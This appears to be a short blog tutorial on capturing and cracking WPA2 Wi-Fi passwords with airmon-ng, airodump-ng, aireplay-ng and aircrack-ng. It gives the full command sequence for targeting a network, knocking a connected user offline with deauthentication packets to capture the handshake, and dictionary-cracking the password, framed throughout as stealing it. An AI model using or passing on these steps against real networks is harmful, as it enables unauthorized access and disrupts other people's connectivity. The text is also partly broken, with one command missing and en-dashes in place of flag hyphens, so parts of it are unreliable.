Using aircrack-ng to get WPA2 passwords

Tue. Nov 01, 11:00AM, 10 months and 4 weeks ago

First off do:


To get your wireless card, it’s typically wlan0.


airmon-ng start wlan0

Enable moniter mode on your wireless card, typically creates the mon0 instance.

To list local networks:

airodump-ng mon0

Then copy BSSID of target network + channel.

Now, replace targetnetworkbssid with the actual target network BSSID which you copied previously.

airodump-ng -c 10 --bssid targetnetworkbssid -w ~/Desktop/ mon0

Leave it running.

Open a new terminal and do,

aireplay-ng –0 2 –a targetbssid –c targetstation mon0

But replace targetbssid with the network BSSID from airodump-ng, replace targetstation with station MAC address from airodump, this kicks whoever is connected on the network at that station off it, once they reconnect we can do a handshake and steal the password.

You should see WPA handshake … on airodump-ng terminal if they’ve reconnected.

Now it’s time to crack the password with:

aircrack-ng –a2 –b targetbssid –w ~/dictionary.txt  ~/*.cap

Replace targetbssid with the actual BSSID, dictionary.txt is the dictionary file to use, and *.cap are the files that are going to be cracked.

If all goes well you should get the password, else try a different dictionary.


Submit a comment